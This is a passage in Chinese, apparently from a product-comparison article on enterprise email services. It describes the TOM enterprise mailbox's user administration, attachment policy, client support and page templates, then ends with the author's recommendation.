使用TOM企业邮箱,用户可以通过管理员界面管理本企业邮箱的用户,任意分配每个用户的空间,方便的进行添加/删除用户和修改用户资料功能(图9)。
图9 |
2、不限附件 多种收发方式
每个用户的邮箱附件大小只与邮箱的空间大小有关,不做人为的限制,允许用户传送大附件的文件,同时企业邮件系统支持用户通过个性化的WEB界面收发邮箱,还支持通过各种客户端软件收发邮件,如Outlook Express,Foxmail等。
3、多风格页面选择
TOM企业邮箱系统提供几套不同风格的邮箱页面模板,企业用户能够自己选择喜爱的Web邮箱页面风格,每个企业用户还可以在Web邮箱页面上放自己的LOGO,尽显企业个性,打造完全自己的邮箱。
通过前面介绍的六大门户网站提供的企业邮箱服务,到哪底哪一款才是最适合自己的产品,相信有户已经有了初步的判断。为了帮助大家更加准确的选购到适合自己的产品,我们提供了横向对比表,从表中提供的信息,能够更加轻松的进行选择。
 |
企业要高效快速的办公,使用企业邮箱无疑是一个很好的解决办法,以上是笔者推荐给大家的六款专业的企业级邮箱系统,希望通过我的介绍,结合企业的实际情况,一定能够选购到称心如意的企业邮箱了。
Labels: email
